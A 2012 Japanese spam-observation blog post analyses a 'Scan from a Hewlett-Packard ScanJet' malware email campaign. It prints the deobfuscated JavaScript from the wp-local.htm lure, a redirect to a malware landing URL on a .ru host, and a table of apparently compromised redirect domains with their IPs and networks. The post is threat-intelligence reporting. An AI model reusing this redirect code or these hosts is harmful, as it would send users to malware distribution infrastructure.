cNotes 検索 一覧 カテゴリ

Scan from a Hewlett-Packard ScanJet - wp-local.htm

Published: 2012/10/11

観測日: 2012/10/10

通数: 20通/day

手法: 誘導URL型

目的: マルウェア感染

よくあるScanjetネタですが、一段目のwp-local.htmが単純なリダイレクトhtmlではなくjavascriptで難読化されてます。


文面。

wp-local.htmの中身。

このjavascriptは実行するとこのようになります。

 var1 = 49;
 var2 = var1;
 if (var1 == var2){
  document.location = "http://samsungonetouch.ru:8080/forum/links/column.php";
 }

最近よく見る手法のjs.jsファイルの中にかかれているタイプのURLが登場します。

リダイレクトの段数が一段すくないというわけですね。


domainip逆引きASAS NameCountry
adsn.biz93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
affo.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
amybazar.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
angelocottone.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
artecuoioab.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
associazione-esperance-onlus-bo.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
babbo-natale.com93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
bellafirma.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
brahmavidya.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
carmeloshadow.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
castellodiflambruzzo.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
cittafuturainfo.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
enzoleone.ge.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
freecomunication.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
gianmarcocapraro.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
ilmiosalento.it93.95.218.17ns1.trovanome.it.3313INET-AS_BT_Italia_S.p.A.Italy
pneumatyka.32.pl83.17.0.148pocztowy.mojsprzet.pl.5617TPNET_Telekomunikacja_Polska_S.A.Poland
rommebel.by91.149.157.46vh42.hoster.by.6697BELPAK-AS_Republican_Association_BELTELECOMBelarus
www.cartronix.de81.169.145.149w95.rzone.de.6724STRATO_STRATO_AGGermany
www.asccelle.com62.75.193.167static-ip-62-75-193-167.inaddr.ip-pool.com.8972PLUSSERVER-AS_intergenia_AGGermany
www.schackie.dk87.238.248.224simone.andersenit.dk.9167WEBPARTNER_WEBPARTNER_A/S_is_a_Danish_Internet_Service_ProviderDenmark
thomas.com.kz82.200.202.152202152.vps.dnr.kz.9198KAZTELECOM-AS_JSC_KazakhtelecomKazakhstan
apredial.com.br200.233.70.146secg70.secrel.com.br.11921Secrelnet_Informatica_LTDABrazil
connemara.seguret.chez.com212.27.63.127perso127-g5.free.fr.12322PROXAD_Free_SASFrance
www.tietokeskus.fi213.145.216.68NONE13170KPO-AS_Kaisanet_OyFinland
www.demandenergy.net64.191.152.130www.sustainablealuminium.com.13776QX-NET-ASN-1_-_QX.NetUnitedStates
www.ingeled.cl190.96.85.131srv131.hostingcl.cl.14259Gtd_Internet_S.A.Chile
www.kompetentni.wscil.edu.pl77.55.126.200aew200.rev.netart.pl.15967NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-AkcyjnaPoland
www.mgoklipiany.pl85.128.163.51alg51.rev.netart.pl.15967NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-AkcyjnaPoland
www.skuteczniejsprzedawac.chodkowska.edu.pl77.55.127.200aex200.rev.netart.pl.15967NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-AkcyjnaPoland
findlooks.hipersoft.ru94.75.204.250argon.vps-private.net.16265LEASEWEB_LeaseWeb_B.V.Netherlands
hipersoft.ru94.75.204.250argon.vps-private.net.16265LEASEWEB_LeaseWeb_B.V.Netherlands
roskukla.u4756.argon.vps-private.net94.75.204.250argon.vps-private.net.16265LEASEWEB_LeaseWeb_B.V.Netherlands
shophip.u4756.argon.vps-private.net94.75.204.250argon.vps-private.net.16265LEASEWEB_LeaseWeb_B.V.Netherlands
antoninetlouise.eu213.186.33.4cluster003.ovh.net.16276OVH_OVH_SystemsFrance
bhjxj.net203.158.16.38NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
dlhanyi.com115.47.170.175NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
fuhaishicai.xinji.us115.47.203.91NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
sailingtech.org180.86.188.55NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
www.hxyyq.com203.158.16.38NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
xinjipeilian.com203.158.16.38NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
yibangdesign.com203.158.16.72NONE17964DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.China
school32-nv.ru81.24.117.118hosting.severen.net.24739SEVEREN-TELECOM_CJSC_Severen-TelecomRussianFederation
clientes.digitalk.cl69.163.253.110apache2-nads.libreville.dreamhost.com.26347DREAMHOST-AS_-_New_Dream_Network_LLCUnitedStates
tramthytrang.com118.139.185.1sg2nlhg266c1266.shr.prod.sin2.secureserver.net.26496AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLCSingapore
unblock.ispghosting.com118.139.175.128ip-118-139-175-128.ip.secureserver.net.26496AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLCSingapore
www.tecknu.com72.167.34.121ip-72-167-34-121.ip.secureserver.net.26496AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLCUnitedStates
www.edsapartments.co.uk77.72.204.74NONE29017GYRON_====UnitedKingdom
isabelamuci.net98.130.164.2rev.opentransfer.com.2.164.130.98.in-addr.arpa.32392OPENTRANSFER-ECOMMERCE_-_Ecommerce_CorporationUnitedStates
mobile.pedromorales.com98.130.164.2rev.opentransfer.com.2.164.130.98.in-addr.arpa.32392OPENTRANSFER-ECOMMERCE_-_Ecommerce_CorporationUnitedStates
screensavers.pedromorales.com98.130.164.2rev.opentransfer.com.2.164.130.98.in-addr.arpa.32392OPENTRANSFER-ECOMMERCE_-_Ecommerce_CorporationUnitedStates
retailcomm.info98.129.229.55NONE33070RMH-14_-_Rackspace_HostingUnitedStates
dugda.admzr.ru79.105.184.73host.admzr.ru.34137RUAMUR-AS_OJSC_RostelecomRussianFederation
www.felena.hu109.200.8.122server9.megacp.com.35662REDSTATION_Redstation_LimitedUnitedKingdom
legobb.com116.255.205.70NONE37943CNNIC-GIANT_ZhengZhou_GIANT_Computer_Network_Technology_Co._LtdChina
makrus.org37.140.192.8server37.hosting.reg.ru.39134SKYMEDIA_United_Network_LLCRussianFederation
www.mmmtlt.ru31.31.196.43server36.hosting.reg.ru.39792ANDERS-AS_Anders_Telecom_Ltd.RussianFederation
www.hermina.pl193.42.154.8ip-193-42-154-8.forward.pl.42673SKYWARE-AS_SKYware_s.c._Rzeszow_PolandPoland
cb-sputnik.ru78.108.80.10web-farm1.majordomo.ru.43362MAJORDOMO_MAJORDOMO_LLCRussianFederation
cb-sputnik.ru78.108.86.10web-farm1.majordomo.ru.43362MAJORDOMO_MAJORDOMO_LLCRussianFederation
salsamalsa.com77.245.149.33srv75626s1.trdns.com.43391NETDIREKT-TR_Netdirekt_A.S.Turkey
yaraticifikir.com77.245.149.55host55.b6.nw.com.tr.43391NETDIREKT-TR_Netdirekt_A.S.Turkey
soluxtour.ru77.222.61.16vh13.sweb.ru.44112SWEB-AS_SpaceWeb_JSCRussianFederation
darkhorsesales.com173.254.28.119just119.justhost.com.46606BLUEHOST-AS-2_-_Bluehost_Inc.UnitedStates
www.ihbp.org69.89.31.105box305.bluehost.com.46606BLUEHOST-AS-2_-_Bluehost_Inc.UnitedStates
school35.centerstart.ru217.19.105.238217-19-105-238.synterra-ug.ru.47218SYNTERRA-UG-AS_OJSC_MegaFonRussianFederation
school82.centerstart.ru217.19.105.238217-19-105-238.synterra-ug.ru.47218SYNTERRA-UG-AS_OJSC_MegaFonRussianFederation
hetzijnertwee.nl91.229.232.54cpweb01.tornadosolutions.nl.50673SERVERIUS-AS_Serverius_Holding_B.V.Netherlands
www.atriaco.sk195.210.29.7max.websupport.sk.51013WEBSUPPORT-SRO-SK-AS_Websupport_s.r.o.Slovakia
www.areo.dk46.30.211.59webcluster04.one.com.51468ONECOM_One.com_A/SDenmark
bappeda.babelprov.go.id49.50.8.249bondol.n.masterweb.net.55660MWN-AS-ID_PT_Master_Web_NetworkIndonesia
hardgamer.ru188.0.1.243PPPoE-188.0.1.243-IP.RastrNET.RU.57261RASTR-AS_Rastr_Ltd.RussianFederation

[カテゴリ:spam観察日記]

by jyake